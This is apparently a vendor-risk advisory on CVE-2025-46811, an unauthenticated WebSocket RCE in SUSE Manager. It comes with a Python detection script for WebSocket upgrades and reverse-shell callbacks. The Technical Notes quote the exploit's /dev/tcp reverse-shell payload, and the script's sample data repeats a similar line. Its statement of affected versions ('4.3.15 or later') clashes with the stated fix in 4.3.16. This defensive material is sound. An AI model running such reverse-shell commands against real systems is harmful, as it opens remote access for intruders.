Remote Code Execution Vulnerability (CVE‑2025‑46811) in SUSE Manager 4.3.15 Allows Attackers to Deploy Reverse Shells
What Happened – A publicly available exploit (EDB‑52527) targets CVE‑2025‑46811 in SUSE Manager 4.3.15 (and Uyuni 2025.05, SUSE Manager 5.0.4). The flaw resides in an unauthenticated WebSocket endpoint that accepts a crafted payload, resulting in remote code execution and a reverse‑shell backdoor.
Why It Matters for TPRM –
- The affected component is a core management interface used by many MSPs and internal IT teams, exposing them to the risk of full‑system compromise.
- Successful exploitation can give attackers unrestricted access to the management server, enabling lateral movement into customer environments.
- The vulnerability is actively exploitable and has a public exploit script, raising the likelihood of real‑world attacks.
Who Is Affected – Enterprises that run SUSE Manager 4.3.15 or later, MSPs offering SUSE‑based services, and any downstream customers whose infrastructure is managed through the compromised console.
Recommended Actions –
- Verify whether any managed assets run the vulnerable versions; if so, upgrade to the patched release (SUSE Manager 4.3.16 or later).
- Apply network‑level segmentation: block external access to the WebSocket endpoint (port 443/9001) unless required.
- Conduct a thorough review of logs for unexpected WebSocket connections and potential reverse‑shell activity.
Technical Notes – The exploit sends a reverse‑shell payload (sh -i >& /dev/tcp/HOST_IP/HOST_PORT 0>&1) over a WebSocket connection, optionally over TLS. No authentication is required, making it a classic unauthenticated RCE via a vulnerable web‑application component. CVE‑2025‑46811 is rated Critical by the vendor. Source: Exploit‑DB 52527
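
A starting point for the log review recommended above, as an added example that is not part of the original advisory or of SUSE's tooling: it flags WebSocket upgrades (HTTP 101) from clients outside an allow-list and extracts /dev/tcp callback targets from recorded command lines. The combined access-log layout, the /ws-placeholder path, the 10.0.0.0/8 allow-list and all sample lines are constructed assumptions.

```python
import ipaddress
import re

# Combined access-log layout of the fronting web server (assumption).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
# /dev/tcp redirection, as in the payload quoted in the Technical Notes.
DEV_TCP_RE = re.compile(r'/dev/tcp/(?P<host>[^/\s]+)/(?P<port>\d{1,5})')


def unexpected_websocket_upgrades(lines, allowed_nets):
    """Return (ip, timestamp, path) for each 101 response sent to a client
    outside allowed_nets (101 Switching Protocols = WebSocket upgrade)."""
    nets = [ipaddress.ip_network(n) for n in allowed_nets]
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["status"] != "101":
            continue
        try:
            ip = ipaddress.ip_address(m["ip"])
        except ValueError:
            continue  # client field is not an IP address; skip the line
        if not any(ip in net for net in nets):
            hits.append((str(ip), m["ts"], m["path"]))
    return hits


def reverse_shell_callbacks(cmdlines):
    """Return (host, port) for every /dev/tcp target found in cmdlines."""
    return [(m["host"], int(m["port"]))
            for cmd in cmdlines for m in DEV_TCP_RE.finditer(cmd)]


# Constructed sample data: placeholder path, documentation-range addresses.
SAMPLE_ACCESS_LOG = [
    '10.0.5.20 - - [01/Aug/2025:10:00:01 +0000] "GET /ws-placeholder HTTP/1.1" 101 0 "-" "-"',
    '198.51.100.23 - - [01/Aug/2025:10:02:17 +0000] "GET /ws-placeholder HTTP/1.1" 101 0 "-" "-"',
    '198.51.100.23 - - [01/Aug/2025:10:02:18 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "-"',
]
SAMPLE_CMDLINES = ["sh -c sh -i >& /dev/tcp/203.0.113.7/4444 0>&1", "rpm -qa"]

if __name__ == "__main__":
    for hit in unexpected_websocket_upgrades(SAMPLE_ACCESS_LOG, ["10.0.0.0/8"]):
        print("unexpected WebSocket upgrade:", hit)
    for host, port in reverse_shell_callbacks(SAMPLE_CMDLINES):
        print("possible reverse-shell callback:", host, port)
```

Feed it the real access log of whatever terminates connections to the management server and the command lines captured by process auditing; both input sources are deployment-specific.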